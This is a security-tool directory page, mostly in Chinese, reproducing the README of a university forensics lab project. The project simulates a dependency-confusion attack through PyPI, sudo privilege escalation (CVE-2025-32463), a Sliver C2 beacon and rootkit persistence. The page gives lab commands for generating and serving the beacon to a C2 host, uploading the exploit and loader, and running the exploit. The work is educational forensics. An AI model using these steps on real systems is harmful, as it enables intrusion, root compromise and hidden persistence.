Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
linux-root-kit — 端到端模拟 Python 依赖混淆攻击、sudo 权限提升(CVE-2025-32463)以及基于 rootkit 的持久化——附带完整的内存和网络取证分析。 | Kitploit
工具/GitHubGitHub/ic3-512/linux-root-kit
权限提升漏洞利用框架内存取证持久化机制网络取证逆向工程数字取证命令与控制供应链安全学习与教育实验室与实践
101241年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
ic3-512/linux-root-kit

linux-root-kit

端到端模拟 Python 依赖混淆攻击、sudo 权限提升(CVE-2025-32463)以及基于 rootkit 的持久化——附带完整的内存和网络取证分析。

查看仓库

About This Project

本项目是在 Technische Hochschule Deggendorf 的 Digitale Forensik 课程中开发的。

它展示了一次完整的法证调查和攻击模拟,涉及:

  • 使用恶意 PyPI 包的 Python 依赖混淆攻击
  • 通过易受攻击的 sudo 版本 (CVE-2025-32463) 进行权限提升
  • 部署 Sliver C2 信标
  • 一个自定义 rootkit,包含内核模块加载、系统调用挂钩和基于 udev 的持久化
  • 使用 Volatility、NetworkMiner 和手动逆向等工具对内存和网络工件进行完整分析

该仓库包含脚本、设置说明、工件以及详细的分析步骤,可复现攻击和法证调查。

目录

  • 权限提升
  • 利用链
  • 工件生成
    • 创建内存转储
    • 在 Ubuntu 上准备网络转储
  • 设置开发者 Ubuntu 客户端 (shell)
    • 1. 克隆仓库并执行
    • 2. 虚拟机启动后,SSH 进入
    • 3. 安装易受攻击的 sudo 和 Python venv
    • 4. 构建用户态加载器二进制文件 (shell)
    • 5. 将 shell 发送到 Kali 以便稍后从那里提供。
  • 设置 Kali (192.168.56.101)
    • 1. 启动 Sliver 服务器
    • 2. 生成 HTTP 信标
    • 3. 重命名并提供信标
    • 4. 启动监听器
  • 模拟开发者
    • 1. 克隆 PoC
    • 2. 创建并激活 Python venv
    • 3. 安装依赖
    • 4. 运行恶意包
  • 模拟攻击者
    • 1. 等待信标并检查 sudo 版本
    • 2. 上传利用程序和加载器
    • 3. 执行 sudo 利用
    • 4. 加载内核模块
    • 5. 设置 udev 规则
    • 6. 重启
    • 7. 在重启时捕获 shell
  • 分析
    • 收集的工件概览
    • 使用 NetworkMiner 快速查看网络概览
    • 详细流量分析
      • GitHub 下载
      • PyPI 下载
      • 恶意 “lilux” 二进制文件检索
    • 下载后行为
      • Sliver 信标活动
      • 未加密的反向 shell
    • 总结
      • 关键发现
      • 法证意义
  • 内存分析
    • 环境和设置
    • 内存转储获取
    • 安装调试符号
    • 生成 Volatility 符号文件
    • 使用符号运行 Volatility
    • (可选)使用 fzf 进行更快的搜索
    • 查找感兴趣的文件
    • 已加载模块
    • Udev 规则
    • 提取 shell
  • 逆向 shell 二进制文件
    • load_module 分支
    • rsh 分支
      • daemonize 函数
      • 反向 Shell
    • 行为总结
      • 行为总结
  • 逆向内核模块
    • 提取内核模块的 Python 脚本
      • 1. 创建范围
      • 2. 比较目标地址
      • 3. 继续直到找到匹配项
    • rkit_init
    • 挂钩的函数
      • Kill 挂钩
      • Getdents(64) 挂钩
    • 模块隐藏
    • 调试信息
    • 反向 Shell 加载器
    • rkit_exit
  • 校验和
  • 使用的工具和版本

权限提升

CVE-2025-32463
NVD 详情
POC Github

[!NOTE]
您必须安装易受攻击的 Sudo 版本(支持 chroot——请参阅 privesc/setup.sh)

利用链```mermaid

sequenceDiagram autonumber participant Attacker participant PyPI participant IntDep as Internal Dep Server participant Dev as Developer participant C2 as C2 Server

Attacker->>PyPI: Publish package with version v1.0.3
Dev->>IntDep: pip install
IntDep-->>Dev: Returns v1.0.1
Dev->>PyPI: Fallback pip install package==v1.0.3
PyPI-->>Dev: Returns malicious v1.0.3 (stager)
Dev->>Dev: Executes stager (package_evil)
Dev->>C2: Beacon/Sliver implant calls home
Note right of C2: Attacker now has RCE

Attacker->>Dev: Enumerates sudo version (1.9.16p2)
Attacker->>Dev: Runs CVE-2025-32463 exploit
Note right of Dev: PE to root

Dev->>Dev: Downloads & runs rootkit loader binary
Dev->>Dev: Loader installs kernel module & configures udev rule
Dev->>Dev: Schedules reboot
Note right of Dev: Attacker established persistence 

Dev->>Dev: System reboots
Dev->>Dev: Udev loads kernel module on boot
Dev->>C2: Kernel-stage beacon calls C2
# 生成工件

所有工件均为手动生成。你将使用两台机器:
- **攻击者机器**(Kali Linux)
- **开发者机器**(Ubuntu)

我们将产生三个工件:
- **PCAP**(重启前)
- **内存转储**(重启后)

## 创建内存转储
[如何转储 VirtualBox 内存](https://www.ired.team/miscellaneous-reversing-forensics/dump-virtual-box-memory)


在宿主机系统上:```shell
vboxmanage list vms
"linux-root-kit_default_1752261916398_20346" {c2d4b5bc-d87f-4dcb-af01-85b78c163fef}
virtualboxvm --startvm "linux-root-kit_default_1752261916398_20346" --dbg

转到界面 --> 调试 在调试控制台 (VMMR0> 提示符):```shell .pgmphystofile 'dumpmem_linux_root_kit'

## 在Ubuntu上准备网络转储
在模拟开发者之前启动。`! port 22` 可用于不记录vagrant ssh连接。```shell
sudo tcpdump -w output.pcap ! port 22

设置开发者 Ubuntu 客户端(shell)

1. 克隆仓库并执行: ```shell

vagrant up

这可能需要一些时间 --> 下载一个用 Bento 构建的完整虚拟机。

## 2. 虚拟机启动后,通过 SSH 登录:  ```shell
vagrant ssh

3. 安装存在漏洞的 sudo 和 Python venv: ```shell

sudo bash /vagrant/privesc/setup.sh sudo apt install python3.12-venv

## 4. 构建用户态加载器二进制文件(`shell`):

你也可以执行 `make` 文件来构建用户态二进制文件 `shell`。这是最简单的方法——否则你需要先安装正确的头文件 :P。

## 5. 将 `shell` 发送到 Kali,以便之后从那里提供它。

# 配置 Kali (192.168.56.101)

## 1. 启动 Sliver 服务器  ```shell
sliver

Sliver 启动

2. 生成一个 HTTP Beacon ```shell

generate beacon --os linux --format elf --arch amd64 --http 192.168.56.101

![Create Sliver Beacon](https://assets.kitploit.com/production/public/readmes/36699/d213950ede6c17da9bce720e79cf2e358748730fab1bde555a184d92341cc61f.png)


## 3. 重命名并服务信标  ```shell
mv INTERNATIONAL_DETENTION lilux
python3 -m http.server 9001

4. 启动监听器 ```

http -l 80 -L 0.0.0.0

# 模拟开发者

## 1. 克隆 PoC

这个仓库可以是任何具有易受依赖混淆攻击配置的仓库 :D。  ```
git clone https://github.com/IC3-512/dependency-confusion-attack.git

2. 创建并激活Python虚拟环境 ```

python3 -m venv .venv source .venv/bin/activate

## 3. 安装依赖  ```
pip install --upgrade --force-reinstall --no-cache-dir -r requirements.txt --verbose 

4. 运行恶意包 ```

python3 app.py

This should start the malicious package, which loads our beacon and executes it.



# Simulate the Attacker

_(Bad opsec xD)_

## 1. Wait for the Beacon and inspect the sudo version:

![Getting an interactive session](https://assets.kitploit.com/production/public/readmes/36699/4730232dbc2909aca3efb51f79f877dd4aa059782fdd4c9f00b7d54cfc642fe8.png)

![Getting a shell](https://assets.kitploit.com/production/public/readmes/36699/d00bd910f805c33e594d42e0334594fabada9452eed44698891fbc27bf64de9f.png)  ```
sudo -V

2. 上传漏洞利用和加载器

exploit.sh 来自 pr0v3rbs (Github 链接),并针对 sudo。 这个 shell 二进制文件来自 Ubuntu 配置过程中的上一步。

这是在 sliver server tui 中完成的: ```shell upload exploit.sh upload shell

## 3. 执行 Sudo 漏洞利用

这是在 sliver OBVIOUS_MEASUREMENT 会话内部的 shell 中执行的。  ```shell
bash exploit.sh

权限提升

4. 加载内核模块

下载工具